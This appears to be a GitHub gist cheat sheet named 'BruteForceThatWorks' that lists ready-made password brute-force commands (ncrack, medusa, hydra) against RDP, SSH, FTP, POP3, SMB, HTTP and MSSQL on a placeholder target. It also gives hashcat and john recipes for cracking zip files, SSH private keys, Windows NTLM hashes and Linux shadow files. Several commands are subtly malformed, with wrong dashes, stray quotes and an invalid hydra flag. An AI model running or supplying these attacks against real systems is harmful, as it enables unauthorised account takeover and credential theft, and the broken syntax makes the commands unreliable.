Skip to content

Instantly share code, notes, and snippets.

@alexandercastillo1
Last active February 4, 2022 02:46
Show Gist options
  • Save alexandercastillo1/143a6fdc5edd2ffd4bbc51298b953320 to your computer and use it in GitHub Desktop.
Save alexandercastillo1/143a6fdc5edd2ffd4bbc51298b953320 to your computer and use it in GitHub Desktop.
BruteForceThatWorks
**NCRACK (RDP)**
ncrack -vv -U /root/Desktop/Usernames.txt -P /root/Desktop/passwords.txt target-ip:3389
**NCRACK (SSH)**
ncrack -vv -U /root/Desktop/Usernames.txt -P /root/Desktop/Passwords.txt target-ip:22
**NCRACK (FTP)**
ncrack -vv -U /root/Desktop/usernames.txt -P /root/Desktop/passwords.txt target-ip:21
**NCRACK (POP3)**
ncrack --user postmaster -p pop3 -P \root\Desktop\password.txt --connection-limit 10 target-ip:110
**NCRACK (SMB)**
ncrack -vv -U /root/Desktop/Usernames.txt -P /root/Desktop/Passwords.txt target-ip:139
**MEDUSA (FTP)** (-u for single username and –U for list of usernames)
Medusa –h target-ip –U /root/Desktop/Usernames.txt –P /root/Desktop/Passwords.txt –M ftp
**MEDUSA (RDP)**
medusa -M rdp -m DOMAIN:THINC -h target-ip –U /root/Desktop/Usernames.txt -P /root/Desktop/Passwords.txt
**MEDUSA (SSH)**
medusa -U /root/Desktop/Usernames.txt’ -P ‘/root/Desktop/Passwords.txt -h target-ip -M ssh –t 3
**MEDUSA (HTTP)**
medusa -h target-ip -U \root\Desktop\username.txt -P \root\Desktop\password.txt -M http
**MEDUSA (SMB)**
medusa -h target-ip -U /root/Desktop/Usernames.txt -P /root/Desktop/Passwords.txt -M smbnt
**MEDUSA (MSSQL)**
medusa -h target-ip -U /root/Desktop/pass.txt -P /usr/share/wordlists/rockyou.txt -O output.txt -M mssql
(on pass.txt "sa")
**HYDRA (SSH)**
hydra -l root -P /usr/share/wordlists/rockyou.txt target-ip -t 4 nsr ssh
**ColdFusion Crack**
hashcat -m 100 /root/Desktop/hash.txt /usr/share/wordlists/rockyou.txt --force --show
**Zip File Crack**
zip2john nameoffile.zip > hash.hash
john hash.hash --wordlist /usr/share/wordlists/rockyou.txt
**id_rsa Crack**
ssh2john id_rsa > pass
john --wordlist:/usr/share/wordlists/rockyou.txt pass
**Windows Hashes Crack**
hashcat -m 1000 -a 0 -o winpass.txt --remove hashonly.hash /usr/share/wordlists/rockyou.txt --force (hash on hashonly.hash file)
**Linux Hashes Crack**
unshadow passwd shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
or
hashcat -m 500 unshadowed /usr/share/wordlists/rockyou.txt --force
@Abelkidane15
Copy link

gfgf

@Abelkidane15
Copy link

hi'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment